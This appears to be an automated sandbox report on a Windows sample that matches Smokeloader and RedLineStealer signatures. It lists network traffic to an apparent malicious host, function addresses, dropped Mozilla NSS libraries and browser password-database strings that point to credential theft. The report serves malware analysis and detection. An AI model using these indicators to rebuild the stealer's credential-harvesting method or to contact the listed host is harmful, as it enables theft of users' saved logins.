Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.5:49758 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.3114034341.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3114136611.0000000002BC1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3114327742.0000000004760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3114094556.0000000002B9B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCCB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CCCB700
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCCB8C0 rand_s,NtQueryVirtualMemory, 0_2_6CCCB8C0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCCB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CCCB910
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC6F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CC6F280
Detected potential crypto function
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC764C0 0_2_6CC764C0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC8D4D0 0_2_6CC8D4D0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC6D4E0 0_2_6CC6D4E0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA6CF0 0_2_6CCA6CF0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC76C80 0_2_6CC76C80
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCC34A0 0_2_6CCC34A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCCC4A0 0_2_6CCCC4A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC75440 0_2_6CC75440
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCD545C 0_2_6CCD545C
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCDAC00 0_2_6CCDAC00
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA5C10 0_2_6CCA5C10
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCB2C10 0_2_6CCB2C10
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCD542B 0_2_6CCD542B
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA0DD0 0_2_6CCA0DD0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCC85F0 0_2_6CCC85F0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC635A0 0_2_6CC635A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC7FD00 0_2_6CC7FD00
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC8ED10 0_2_6CC8ED10
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC90512 0_2_6CC90512
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCD76E3 0_2_6CCD76E3
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC6BEF0 0_2_6CC6BEF0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC7FEF0 0_2_6CC7FEF0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCCE680 0_2_6CCCE680
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC85E90 0_2_6CC85E90
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCC4EA0 0_2_6CCC4EA0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCB2E4E 0_2_6CCB2E4E
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC84640 0_2_6CC84640
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC89E50 0_2_6CC89E50
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA3E50 0_2_6CCA3E50
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCD6E63 0_2_6CCD6E63
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC6C670 0_2_6CC6C670
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCB5600 0_2_6CCB5600
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA7E10 0_2_6CCA7E10
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCC9E30 0_2_6CCC9E30
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC6DFE0 0_2_6CC6DFE0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC96FF0 0_2_6CC96FF0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCB77A0 0_2_6CCB77A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC79F00 0_2_6CC79F00
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA7710 0_2_6CCA7710
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCD50C7 0_2_6CCD50C7
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC8C0E0 0_2_6CC8C0E0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA58E0 0_2_6CCA58E0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC960A0 0_2_6CC960A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC88850 0_2_6CC88850
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC8D850 0_2_6CC8D850
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCAF070 0_2_6CCAF070
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC77810 0_2_6CC77810
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCAB820 0_2_6CCAB820
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCB4820 0_2_6CCB4820
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA5190 0_2_6CCA5190
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCC2990 0_2_6CCC2990
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC6C9A0 0_2_6CC6C9A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC9D9B0 0_2_6CC9D9B0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC8A940 0_2_6CC8A940
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC7D960 0_2_6CC7D960
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCBB970 0_2_6CCBB970
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCDB170 0_2_6CCDB170
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA8AC0 0_2_6CCA8AC0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC81AF0 0_2_6CC81AF0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCAE2F0 0_2_6CCAE2F0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCDBA90 0_2_6CCDBA90
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC622A0 0_2_6CC622A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC94AA0 0_2_6CC94AA0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC7CAB0 0_2_6CC7CAB0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCD2AB0 0_2_6CCD2AB0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCA9A60 0_2_6CCA9A60
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCD53C8 0_2_6CCD53C8
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC6F380 0_2_6CC6F380
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC65340 0_2_6CC65340
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC7C370 0_2_6CC7C370
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCAD320 0_2_6CCAD320
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD6ECD0 0_2_6CD6ECD0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD0ECC0 0_2_6CD0ECC0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD1AC60 0_2_6CD1AC60
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDD6C00 0_2_6CDD6C00
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDEAC30 0_2_6CDEAC30
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE9CDC0 0_2_6CE9CDC0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDA6D90 0_2_6CDA6D90
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD14DB0 0_2_6CD14DB0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDDED70 0_2_6CDDED70
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE3AD50 0_2_6CE3AD50
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE98D20 0_2_6CE98D20
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD1AEC0 0_2_6CD1AEC0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDB0EC0 0_2_6CDB0EC0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD96E90 0_2_6CD96E90
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDAEE70 0_2_6CDAEE70
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDF0E20 0_2_6CDF0E20
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDEEFF0 0_2_6CDEEFF0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD10FE0 0_2_6CD10FE0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE58FB0 0_2_6CE58FB0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD1EFB0 0_2_6CD1EFB0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD7EF40 0_2_6CD7EF40
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDD2F70 0_2_6CDD2F70
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD16F10 0_2_6CD16F10
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE50F20 0_2_6CE50F20
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE168E0 0_2_6CE168E0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDE4840 0_2_6CDE4840
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD60820 0_2_6CD60820
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD9A820 0_2_6CD9A820
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE2C9E0 0_2_6CE2C9E0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD449F0 0_2_6CD449F0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDD09B0 0_2_6CDD09B0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDA09A0 0_2_6CDA09A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDCA9A0 0_2_6CDCA9A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD48960 0_2_6CD48960
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD66900 0_2_6CD66900
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD8EA80 0_2_6CD8EA80
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD8CA70 0_2_6CD8CA70
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDBEA00 0_2_6CDBEA00
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDC8A30 0_2_6CDC8A30
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE16BE0 0_2_6CE16BE0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDB0BA0 0_2_6CDB0BA0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CD564D0 0_2_6CD564D0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDAA4D0 0_2_6CDAA4D0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CE3A480 0_2_6CE3A480
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: String function: 6CE909D0 appears 121 times
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: String function: 6CE9DAE0 appears 31 times
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: String function: 6CC9CBE8 appears 134 times
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: String function: 6CCA94D0 appears 90 times
One or more processes crash
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6524 -s 2900
Sample file is different than original file name gathered from version info
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137578625.000000006CCF2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Wb9LZ5Sn1l.exe
Source: Wb9LZ5Sn1l.exe, 00000000.00000000.1959113898.0000000001A05000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesFirezer. vs Wb9LZ5Sn1l.exe
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137815673.000000006CEE5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Wb9LZ5Sn1l.exe
Source: Wb9LZ5Sn1l.exe Binary or memory string: OriginalFilenamesFirezer. vs Wb9LZ5Sn1l.exe
Uses 32bit PE files
Source: Wb9LZ5Sn1l.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.3114034341.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3114136611.0000000002BC1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3114327742.0000000004760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3114094556.0000000002B9B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@2/33@1/1
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CCC7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CCC7030
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415D00
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6524
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\b5b7c197-4400-456e-b6cf-92123eb05479 Jump to behavior
Source: Wb9LZ5Sn1l.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137376458.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137376458.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137376458.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137376458.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Wb9LZ5Sn1l.exe, Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137376458.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137376458.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137376458.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2395649483.00000000235D2000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2384409865.00000000235B4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2384626104.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp, GHDHDGHJEBGIDGDGIJJK.0.dr, HDBGHIDGDGHCBGDGCBFI.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137376458.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137376458.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: Wb9LZ5Sn1l.exe ReversingLabs: Detection: 47%
Source: Wb9LZ5Sn1l.exe Virustotal: Detection: 48%
